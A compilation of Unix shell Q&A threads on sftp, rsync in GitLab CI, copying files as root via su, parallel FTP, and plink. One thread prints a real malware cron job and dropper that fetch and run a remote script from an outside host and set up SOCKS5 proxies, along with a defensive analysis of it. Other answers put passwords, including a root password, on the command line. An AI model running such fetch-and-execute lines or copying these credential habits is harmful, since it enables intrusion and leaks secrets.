Delete local AIX files after a successful upload to an SFTP server - sftp

I have two AIX SFTP servers.
I want to move multiple files whose names start with the word cash, e.g. cash2001.txt, from one server to another using an sftp script, and then delete the successfully moved files from the original server.
I have tried the below script but it's not working:
sftp -P 10022 EUSER_20233@11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
rm /data/sftp/current/cash*
EOF

As the rm should delete local files, you must execute it in the shell, not in sftp:
sftp -P 10022 EUSER_20233@11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
EOF
rm /data/sftp/current/cash*
You may want to improve your code so that it deletes the files only when the transfer succeeds. Based on How to confirm SFTP file delivery?, you can do this (in bash; I do not know AIX):
sftp -P 10022 -b - EUSER_20233@11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
EOF
if [ $? -eq 0 ]
then
    rm /data/sftp/current/cash*
fi
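If you need finer granularity, so that one failed file does not block deleting the others, a per-file loop is another option. This is only a sketch under the same assumptions as above (bash, OpenSSH sftp, and the question's host string):
for f in /data/sftp/current/cash*; do
    [ -e "$f" ] || continue            # skip if the glob matched nothing
    # With -b -, sftp reads the batch from stdin and exits non-zero if the
    # put fails, so the rm below only runs for files that really uploaded.
    if echo "put $f" | sftp -P 10022 -b - EUSER_20233@11.214.6.920; then
        rm "$f"
    fi
done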

Related

How to deploy identically using rsync with gitlab-ci?

When I push and my project does not yet exist on my server, everything is fine (obviously):
rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER@$SSH_HOST:blog_symfony/
building file list ... done
created directory blog_symfony
[...]
sent 44,533,927 bytes received 5,523 bytes 5,239,935.29 bytes/sec
total size is 238,959,003 speedup is 5.37
The problem is when I push a second time; then it does this:
rsync: [generator] delete_file: rmdir(project/blog_symfony/project/blog_symfony) failed: Permission denied (13)
rsync: [generator] delete_file: rmdir(project/blog_symfony) failed: Permission denied (13)
deleting project/blog_symfony/translations/.gitignore
deleting project/blog_symfony/translations/
[...]
On the server side, it creates a 'project' folder inside the blog_symfony folder:
cannot delete non-empty directory: project/blog_symfony
cannot delete non-empty directory: project
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1207) [sender=3.1.3]
sent 13,924 bytes received 175 bytes 28,198.00 bytes/sec
total size is 238,959,004 speedup is 16,948.65
Cleaning up project directory and file based variables 00:01
ERROR: Job failed: exit code 1
my gitlab-ci:
before_script:
- 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )'
- eval $(ssh-agent -s)
- echo "$SSH_PRIVATE_KEY" | tr -d '\r' | ssh-add -
- mkdir -p ~/.ssh
- chmod 700 ~/.ssh
- '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" >> ~/.ssh/config'
script:
- ls
- apt-get update && apt-get install rsync -y
- ssh $SSH_USER@$SSH_HOST "ls"
- rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER@$SSH_HOST:blog_symfony/
- ssh $SSH_USER@$SSH_HOST "cd blog_symfony && docker-compose build && docker-compose up"
In ls -l I have a folder written by rsync which is impossible to remove from gitlab-ci:
drwxrwxr-x 3 root root 4096 Dec 14 23:26 project
I don't think this is normal. This is the first time that I use gitlab-ci for a symfony project.
Thank you for your help
ls -l: I have a folder written by rsync which is impossible to remove from GitLab CI.
Check if that folder is instead created after the first execution of your docker-compose up: if your Docker image executes itself internally as USER root, using a bind mount, it would write files/folders as root.
And that would impede normal operation (on the server, outside the container), like your rsync, because root-owned files would be in the way.
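To check this theory on the server (outside the container), something like the following can help; the paths match the question, while the cleanup commands and the non-root user suggestion are assumptions for illustration:
# Check the numeric owner of the rogue folder; UID 0 means it was written
# as root, most likely by the container through a bind mount.
ls -lnd blog_symfony/project
# Remove it (or hand it back to the deploy user) once, with root rights,
# so the next rsync --delete-after can succeed again:
sudo rm -rf blog_symfony/project
# or: sudo chown -R "$(id -u):$(id -g)" blog_symfony/project
# To keep it from coming back, run the containers as a non-root user
# (for example with a "user:" entry in docker-compose.yml), so that
# bind-mounted files are no longer created as root.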

How to copy files to remote server with a user without privileges?

When I need to copy a file from the local server (server A) to a remote server (server B) via SSH, using a user with enough privileges, I do this successfully like below:
localpath='/this/is/local/path/file1.txt'
remotepath='/this/is/remote/path/'
mypass='MyPassword123'
sshpass -p $mypass scp username@hostname:$localpath $remotepath
Now, I have to transfer a file from server A to server C with a user that doesn't have enough privileges to copy. Once I'm connected to Server C, I need to run su in order to be able to run commands like cd, ls, etc.
Manually, I access the server C via SSH like this:
[root@ServerA ~]# ssh username@hostname
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
Last login: Sat Jun 13 10:17:40 2020 from XXX.XXX.XXX.XXX
ServerC ~ $
ServerC ~ $ su
Password:
ServerC /home/myuser #
ServerC /home/myuser # cd /documents/backups/
ServerC /documents/backups #
At this moment myuser has superuser privileges and I can send commands.
Then, how can I automate the task of copying files from server A to server C, given the need to run su once I'm connected to Server C?
I've tried so far doing like this:
sshpass -p $mypass ssh -t username@hostname "su -c \"cd /documents/backups/ && ls\""
It requests the password for su and I'm able to run cd and ls, but with this command I'm not copying files from Server A to Server C, only semi-automating the access to Server C and running su on Server C.
Thanks in advance for any help.
UPDATE
# $TAR | ssh $username@$hostname "$COMMAND"
+ tar -cv -C /this/is/local/path/file1.txt .
+ ssh username@X.X.X.X 'set -x; rm -f /tmp/copy && mknod /tmp/copy p; su - <<< "su_password
set -x; tar -xv -C /this/is/remote/path/ . < /tmp/copy" & cat > /tmp/copy'
tar: /this/is/local/path/file1.txt: Cannot chdir: Not a directory
tar: Error is not recoverable: exiting now
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
+ rm -f /tmp/copy
+ mknod /tmp/copy p
+ su -
+ cat
Password:
Editorial note: the previous version of this answer used sudo, the current version uses su as requested in the question.
You could use tar and pipes, like so:
TAR="tar -cv -C $localpath ."
UNTAR="tar -xv -C $remotepath ."
PREPARE_PIPE="rm -f /tmp/copy && mknod /tmp/copy p"
NEWLINE=$'\n' # that's the easiest way to get a literal newline
ROOT_PASSWORD=rootpasswordverydangerous
COMMAND="set -x; $PREPARE_PIPE; su - <<< \"${ROOT_PASSWORD}${NEWLINE} set -x; $UNTAR < /tmp/copy\" & cat > /tmp/copy"
$TAR | ssh username@hostname "$COMMAND"
Explanation:
tar -c . archives the current directory into a single file. We aren't passing -f to tar, so that single file is standard output.
tar -x . extracts the content of a single tar archive file to the current directory. We aren't passing -f to tar, so that single file is standard input.
-C <path> tells tar to cd into <path> so that it will be the current directory in which files are copied from/to.
-v just tells tar to list the files tar archives/extracts, for debugging purposes.
Likewise, set -x is just to have bash to emit trace information, for debugging purposes.
So we're archiving $localpath into stdout, and piping it to ssh, which will pipe it to $COMMAND.
If there was a way to give su the password in the command line, we would have used something like:
$TAR | ssh ... su --password ${ROOT_PASSWORD} -c "$UNTAR"
and things would have been simple.
But su doesn't have that. su runs like a shell, reading from stdin. So it will first read the password, and once the password is read and su has established a root session, it reads commands from stdin. That's why we have su - <<< \"${ROOT_PASSWORD}${NEWLINE}${UNTAR}\".
But now stdin is used by the password and command, so we can't use it as the archive. We could use another file descriptor, but I prefer not to, because then the solution can be more easily ported to work with sudo instead of su. sudo closes all file descriptors, and sudo -C 200 (only close file descriptors above 200) may not work (didn't work on my test machine).
If we went that direction, we would have used something like
$TAR | ssh ... 'exec 9<&2 && sudo -S <<< $mypass bash -c "$UNTAR <&9"'
Our next option is to do something like cat > /tmp/archive.tar in order to write the entire archive into a file, and then have something like $UNTAR < /tmp/archive.tar. But the archive may be huge and we may run out of disk space.
So the idea is to create a dedicated pipe - that's PREPARE_PIPE. Pipes don't save anything to disk, and don't store the entire stream in memory, so the reader and the writer have to work concurrently (you know, like with a real pipe).
So having redirected su's stdin from $ROOT_PASSWORD, we pull ssh's stdin into our pipe with cat > /tmp/copy, and in parallel (&) having $UNTAR read from the pipe (< /tmp/copy).
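To make the pipe trick easier to follow, here is the same pattern in isolation, as a sketch without ssh or su, using mkfifo (equivalent to mknod ... p) and made-up paths:
# Create the named pipe; nothing is stored on disk and nothing is buffered
# in memory beyond the pipe's small kernel buffer.
rm -f /tmp/copy && mkfifo /tmp/copy
# Reader: extract from the pipe in the background.
tar -xv -C /some/destination . < /tmp/copy &
# Writer: archive into the pipe; reader and writer run concurrently and
# finish together, just like the pair inside $COMMAND above.
tar -cv -C /some/source . > /tmp/copy
wait            # wait for the background reader to finish
rm -f /tmp/copy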
Notes:
You could also pass -z to both tar commands to pass it compressed, if your network is too slow.
tar will preserve the source's metadata, e.g. timestamps and ownership.
Passing $ROOT_PASSWORD to commands is not good practice; anyone who runs ps -ef can see the password. There are ways to pass the password to server C in a more secure way, but I didn't include them in order not to further complicate this answer.
I would suggest asking the server's owner to install sudo, so that if the password is compromised via ps -ef, at least it's not the root password.

some malware that appeared on our site related to the recent wordpress attack

Apparently a site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
The file it was pulling is this (obviously, don't try to execute it...):
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, it kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl, which can be downloaded from SourceForge. The version used here differs from the SourceForge version in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script rather than passed in on the command line. I suspect that the purpose of the latter change is to make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax for that command. If you find it, use the kill command to stop it.
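For example, something along these lines (a sketch; the PID shown is just a placeholder):
# The [p] keeps grep from matching its own command line.
ps wax | grep '[p]erl httpd'
# If a line shows up, take the PID from its first column and stop it:
kill 12345          # placeholder PID; add -9 only if it refuses to exit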

How do I FTP multiple files at the same time ( parallel) from UNIX

We have to transfer 10 files in parallel from a Unix machine using a shell script, via FTP.
Just put each download process in the background by appending an ampersand:
wget --ftp-user=*** --ftp-password=*** ftp://server/file_A 1> /dev/null 2> /dev/null&
wget --ftp-user=*** --ftp-password=*** ftp://server/file_B 1> /dev/null 2> /dev/null&
wget --ftp-user=*** --ftp-password=*** ftp://server/file_C 1> /dev/null 2> /dev/null&
...
If the FTP server doesn't impose any limits on the number of concurrent connections, you can run many ftp sessions in the background. E.g. (note: I'll assume a generic GNU-like ftp client; command-line options and input strings may be different):
for i in file1 file2 file3 ... file10; do
echo "get $i" | ftp $ServerHost --user $username --password "$xxx" --binary >/dev/null 2>&1 &
done
wait
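If you also need to know whether every transfer succeeded, a sketch like the following collects each background job's exit status; the file names, credentials and server are placeholders:
pids=""
for f in file_A file_B file_C; do
    wget --ftp-user="$user" --ftp-password="$pass" -q "ftp://server/$f" &
    pids="$pids $!"
done
status=0
for p in $pids; do
    wait "$p" || status=1     # remember if any download failed
done
exit $status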

Problem with plink output

I'm using plink to run a command on a Unix remote machine.
The command is:
ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';
The way I'm sending this command is by using a file with a set of commands like:
plink.exe -ssh -t -l user -pw pwd tst.url.pt -m commands.out
When I run the command this way, plink does not receive any input. It seems that it is waiting for input.
But if I run:
plink.exe -ssh -t -l user -pw pwd tst.url.pt "ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';"
I get the expected result.
I'm not using plink with a commands file by choice. I'm using test automation software that allows me to run tests on remote hosts, and this is the way the tool works.
Any thoughts on what is going wrong?
I tested the command you provided and it worked without problems.
Maybe the problem is related to:
The server's host key is not cached in the registry.
The path to the file is not correct.
The file is empty.
Include the server hostkey.
Most importantly, you need to include the Unix profile using the -m parameter.
You can also include all your commands in the same file where the profile is kept.
$Output = ((plink.exe -hostkey hostkey -l UNAME -i SSHKEY -P 22 -ssh server -batch -m PROFILE) | ? {$_ -ne ""})
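For illustration, the file passed to -m (PROFILE above) might look something like this; the profile path and the command are assumptions based on the question, not something tested on your server:
# Source the login profile first so PATH and the environment match an
# interactive session, then run the actual command(s).
. "$HOME/.profile"
ls -1trd testegrep.txt | tail -1 | xargs tail -f | grep 's'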
